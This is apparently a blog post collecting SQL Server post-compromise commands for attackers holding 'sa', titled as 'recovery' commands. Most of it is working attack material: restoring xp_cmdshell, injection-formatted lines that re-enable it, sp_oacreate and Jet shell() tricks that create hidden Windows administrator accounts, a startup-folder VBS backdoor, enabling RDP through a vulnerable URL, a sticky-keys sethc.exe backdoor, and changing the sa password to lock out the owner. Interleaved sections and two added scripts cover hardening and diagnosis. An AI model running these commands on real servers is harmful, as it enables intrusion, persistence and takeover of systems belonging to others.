

SQL recovery commands (the complete collection)

2009-08-29 09:48
Getting past the various obstacles once you hold sa:
==========================================================================================
xp_cmdshell related:

Error: Could not find stored procedure 'master..xp_cmdshell'.
Re-register it against the DLL that ships with the server's own version (xplog70.dll on SQL Server 2000, xpsql70.dll on SQL Server 7.0), then press F5 to run it:
EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
On SQL Server 7.0 instead:
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
------------------------------------------------------------------------------------------
Error: Cannot load DLL xpsql70.dll or one of the DLLs it references. Reason 126 (The specified module could not be found.)
Step 1: sp_dropextendedproc 'xp_cmdshell'
Step 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'   then press F5
Reason 126 means the DLL file itself is missing from the Binn directory (an administrator has usually deleted it), so re-registering only helps once a matching copy of the DLL is back on disk; see the xplog70.dll workaround below, which registers the procedure against a DLL you upload yourself.
------------------------------------------------------------------------------------------
Error: Could not find function xp_cmdshell in library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)
xpweb70.dll only exports the xp_*webtask procedures; xp_cmdshell is exported by xplog70.dll, so the registration has to point there (re-registering against xpweb70.dll just reproduces the error):
Step 1: exec sp_dropextendedproc 'xp_cmdshell'
Step 2: exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
------------------------------------------------------------------------------------------
Restoring xp_cmdshell (SQL Server 7.0 DLL):
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
------------------------------------------------------------------------------------------
New way of restoring xp_cmdshell (restores it directly, regardless of whether sp_addextendedproc still exists):
Remove:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
------------------------------------------------------------------------------------------
Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
(dbcc addextendedproc is the undocumented command that sp_addextendedproc is a thin wrapper around; it requires sysadmin.)
------------------------------------------------------------------------------------------
Statement that drops the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
------------------------------------------------------------------------------------------
SQL statement that restores (re-enables) xp_cmdshell:
exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
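As an added check that is not part of the original post: rather than trying the repairs above one after another, the following T-SQL reports which failure case you are actually in. It assumes a sysadmin login, changes nothing, and runs on SQL Server 2000 as well as 2005 and later (the 2005-only catalog view is queried through EXEC so the batch still compiles on 2000).

```sql
-- Added example, not from the original post: take stock of xp_cmdshell before
-- repairing it. Read-only. Assumes a sysadmin login.
use master;
set nocount on;

-- 1. Is anything called xp_cmdshell registered at all?
--    0 rows: it was dropped; re-register it with sp_addextendedproc or
--    dbcc addextendedproc.
select name, crdate
from master.dbo.sysobjects
where xtype = 'X' and name = 'xp_cmdshell';

-- 2. Which DLL is the registration bound to? sp_addextendedproc stores the
--    DLL name, not the file, so a wrong name survives a reinstall of the DLL.
--    Expected: xplog70.dll on SQL Server 2000 and later, xpsql70.dll on 7.0.
--    xpweb70.dll does not export xp_cmdshell and produces the "reason 127" error.
exec sp_helpextendedproc 'xp_cmdshell';

-- 3. Are the helpers needed to re-register it still present? If
--    sp_addextendedproc is gone, use dbcc addextendedproc directly or
--    recreate it from the definition given later on this page.
select name
from master.dbo.sysobjects
where xtype = 'P' and name in ('sp_addextendedproc', 'sp_dropextendedproc');

-- 4. On 2005 and later, being registered is not enough: the component must
--    also be switched on with sp_configure. sys.configurations only exists
--    from 2005, so the query goes through EXEC to keep this batch valid on 2000.
--    ProductVersion looks like '8.00.760' or '9.00.5000.00'; the first number
--    is the major version (8 = 2000, 9 = 2005, 10 = 2008).
declare @ver varchar(32), @major int;
set @ver = cast(serverproperty('ProductVersion') as varchar(32));
set @major = cast(left(@ver, charindex('.', @ver) - 1) as int);
if @major >= 9
    exec('select name, value_in_use
          from sys.configurations
          where name in (''xp_cmdshell'', ''Ole Automation Procedures'', ''Ad Hoc Distributed Queries'')');
else
    print 'SQL Server 2000 or older: no sp_configure switch, registration alone is enough';

-- 5. Smoke test. The error text, if any, says which case above applies:
--    "Could not find stored procedure"          -> step 1
--    "Cannot load DLL ... Reason 126"           -> DLL file missing from Binn
--    "Could not find function ... Reason 127"   -> wrong DLL name in step 2
--    "SQL Server blocked access to ... xp_cmdshell" -> step 4
exec master..xp_cmdshell 'ver';
```

Run it as a single batch in Query Analyzer or Management Studio; each step produces its own result set, and the last one either prints the Windows version banner or the error that names the repair you need.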
------------------------------------------------------------------------------------------
Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.
------------------------------------------------------------------------------------------
Restore xp_cmdshell and check in one go:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.
------------------------------------------------------------------------------------------
xplog70.dll workaround
==========================================================================================
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
If that fails because the DLL has been deleted: first drop the stored procedure,
use master
EXEC sp_dropextendedproc 'xp_cmdshell'
then upload xplog70.dll to some directory, for example the root of C:, and run
use master
dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
The DLL is loaded into the SQL Server process, so it must come from the same SQL Server version and build, and the service account needs read access to the path you put it in.
------------------------------------------------------------------------------------------
SQL statement that blocks xp_cmdshell:
sp_dropextendedproc 'xp_cmdshell'
=========================================================================================
Enabling xp_cmdshell on SQL Server 2005:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
------------------------------------------------------------------------------------------
Enabling OPENROWSET support on SQL 2005:
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
exec sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
------------------------------------------------------------------------------------------
Enabling sp_oacreate support on SQL 2005:
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
exec sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
=========================================================================================
Taking xp_cmdshell away from sa
If you do not need the extended stored procedure xp_cmdshell, remove it with this SQL statement:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell is the shortest road from the database into the operating system, a wide-open back door that the database leaves into the OS. Bear in mind that any sysadmin login, sa included, can register it again with the statements on this page, so dropping it slows down an attacker but does not stop one who already holds sa; a strong sa password and an application login that is not sysadmin are what actually close the door. If you do need the stored procedure, this statement restores it:
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
(xpsql70.dll is the SQL Server 7.0 DLL; on SQL Server 2000 use 'xplog70.dll'.)
==========================================================================================
Dropping the dangerous SQL stored procedures:
DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
DROP PROCEDURE sp_addextendedproc
Note: sp_dropextendedproc only works on extended procedures (xtype 'X'). sp_add_job and sp_addtask are ordinary stored procedures in msdb, so those two lines fail; if you really want them gone, DROP PROCEDURE them in msdb, which breaks SQL Agent jobs. Dropping sp_addextendedproc last removes the easy way of putting everything back, but dbcc addextendedproc still works for any sysadmin.
==========================================================================================
Restoring the dangerous stored procedures
use master
exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
(There is no xp_cmdshell.dll; xp_cmdshell is registered against xplog70.dll like the other xplog70 procedures.)
==========================================================================================
Miscellaneous
------------------------------------------------------------------------------------------
SQL Server blocked access to procedure 'sys.sp_OAMethod' of component 'Ole Automation Procedures'
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
EXEC sp_configure 'Ole Automation Procedures';
GO
------------------------------------------------------------------------------------------
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell'
(Each line below is one statement to send through an injection point: the leading ; terminates the application's query and the trailing -- comments out whatever the application appends.)
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
------------------------------------------------------------------------------------------
Could not find stored procedure sp_addextendedproc
Recreate it (in master) from its original definition:
create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517),  /* (owner.)name of function to call */
    @dllname varchar(255)      /* name of DLL containing function */
as
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002,-1,-1,'sp_addextendedproc')
        return (1)
    end
    dbcc addextendedproc( @functname, @dllname)
    return (0) -- sp_addextendedproc
GO
------------------------------------------------------------------------------------------
==========================================================================================
Vulnerability remediation
------------------------------------------------------------------------------------------
1. Changing the sa password:
After connecting with an SQL exploitation tool, run:
exec sp_password NULL,'NewPassword','sa'
(Caution: use sparingly! The old password is not needed because the caller is sysadmin, and the legitimate administrator will notice being locked out.)
-----------------------------------------------------------------------------------------
2. Quick mitigation for a weak sa password (drops xp_cmdshell if it is registered; run in master):
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
=========================================================================================
The ultimate add-user method
------------------------------------------------------------------------------------------
Windows 2000 Server:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user NewUser Password /add'
------------------------------------------------------------------------------------------
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators NewUser /add'
------------------------------------------------------------------------------------------
Windows XP or 2003 Server:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user NewUser Password /add'

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators NewUser /add'
------------------------------------------------------------------------------------------
Or, generically:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX'    -- XXXXX is the command you want to run
------------------------------------------------------------------------------------------
Both steps in one call:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net user NewUser Password /add & net localgroup administrators NewUser /add'
------------------------------------------------------------------------------------------
Through the Jet OLE DB provider: first switch off Jet's sandbox mode in the registry (SandBoxMode = 0 allows shell() inside Jet expressions), then run shell() via OPENROWSET against any .mdb the service account can open (ias.mdb ships with Windows):
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user NewUser Password /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators NewUser /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup ""Remote Desktop Users"" NewUser /add")');
(The group name contains spaces, so it has to be quoted inside the shell() string; inside a Jet double-quoted literal a quote character is written as "".)
------------------------------------------------------------------------------------------
Restoring xp_cmdshell (seems to need a reboot)
First tried restoring xp_cmdshell with sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', and found that xpsql70.dll had been deleted. So instead, write a VBS file into the Startup group (the path below is the All Users Startup folder on a Chinese-locale Windows; the script only runs at the next interactive logon, which is why a reboot or logon is needed):
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'set wshshell=createobject("wscript.shell")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'a=wshshell.run ("cmd.exe /c net user NewUser Password /add",0)'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'b=wshshell.run ("cmd.exe /c net localgroup administrators NewUser /add",0)'
exec @ret = sp_oamethod @f, 'close'    -- flush and release the file
------------------------------------------------------------------------------------------
Getting past a missing xplog70.dll (run through WScript.Shell instead; the trailing '0','true' are WindowStyle hidden and WaitOnReturn):
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user Username Password /add','0','true'

declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators Username /add','0','true'
------------------------------------------------------------------------------------------
Activating Guest:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes' --activate the Guest account

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add' --add Guest to the Administrators group
------------------------------------------------------------------------------------------
SQL Server administrator login:
exec master..sp_addlogin Username, Password
exec master..sp_addsrvrolemember Username, sysadmin
Adds a database login; sysadmin is the highest privilege level.
------------------------------------------------------------------------------------------
Common SQL privilege escalation:
exec xp_cmdshell 'net user Username Password /add'
exec xp_cmdshell 'net localgroup Administrators Username /add'
------------------------------------------------------------------------------------------
==========================================================================================
Check the RDP (3389) port:
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Enable RDP (3389):
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
The same, sent through a vulnerable URL parameter:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
==========================================================================================
Copy-file sticky-keys backdoor (replaces sethc.exe, which Windows launches as SYSTEM from the logon screen when Shift is pressed five times; the extra copy into dllcache stops Windows File Protection from putting the original back; /y suppresses the overwrite prompt, which would otherwise hang with no console attached):
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'c:\windows\system32\cmd.exe /c copy /y C:\WINDOWS\system32\taskmgr.exe c:\windows\system32\sethc.exe'

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'c:\windows\system32\cmd.exe /c copy /y c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe'
------------------------------------------------------------------------------------------
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
===========================================================================================
List a directory:
exec master.dbo.xp_subdirs 'c:\'
List the fixed drives:
exec master..xp_fixeddrives
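As an added example that is not part of the original post, here is the defender's counterpart to everything above for SQL Server 2005 and later (on 2000 the answer is sp_dropextendedproc as shown earlier). It closes the components this page enables, verifies the result, lists who could simply re-enable them, and reads back the two registry values the page flips. It assumes a sysadmin login and the default registry locations; the DisallowAdHocAccess line relies on the undocumented sp_MSset_oledb_prop procedure.

```sql
-- Added example, not from the original post: the defender's side of the page.
-- SQL Server 2005 or later. Assumes a sysadmin login and default registry paths.
use master;
set nocount on;

-- 1. Switch off the three components the page turns on, then hide the advanced
--    options again so they do not appear in a casual sp_configure listing.
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
exec sp_configure 'Ole Automation Procedures', 0;
exec sp_configure 'Ad Hoc Distributed Queries', 0;
reconfigure;
exec sp_configure 'show advanced options', 0;
reconfigure;

-- 2. Verify: value_in_use must be 0 for all three.
select name, value_in_use
from sys.configurations
where name in ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');

-- 3. Independently of step 1, deny the Jet provider ad hoc use; this is what
--    stops the OPENROWSET ... shell() trick even if someone re-enables
--    Ad Hoc Distributed Queries. sp_MSset_oledb_prop is undocumented; it
--    writes the provider's DisallowAdHocAccess registry value.
exec sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'DisallowAdHocAccess', 1;

-- 4. Anyone in sysadmin can undo steps 1 to 3 with the commands on this page,
--    so the role membership is the real attack surface. The application's
--    login should not appear here.
exec sp_helpsrvrolemember 'sysadmin';

-- 5. Logins planted with sp_addlogin / sp_addsrvrolemember show up as the
--    newest rows (S = SQL login, U = Windows login, G = Windows group).
select name, type_desc, create_date, modify_date
from sys.server_principals
where type in ('S', 'U', 'G') and name not like '##%'
order by create_date desc;

-- 6. Stop depending on the sa password at all (only once nothing still
--    authenticates as sa).
alter login sa disable;

-- 7. Read back the registry values the page flips. xp_regread returns one
--    (Value, Data) row. fDenyTSConnections: 1 means RDP is off. SandBoxMode:
--    2 or 3 keep shell() blocked for non-Access callers; 0 or 1 let it run.
exec master..xp_regread 'HKEY_LOCAL_MACHINE',
    'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections';
exec master..xp_regread 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode';
```

Steps 1 to 3 are the ones the attacker's commands on this page reverse in a single batch, which is why step 4 matters more than the rest: as long as the web application's login is a member of sysadmin, every setting here is one injected statement away from being undone.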

posted on 2010-11-14 11:23 by sjgkkk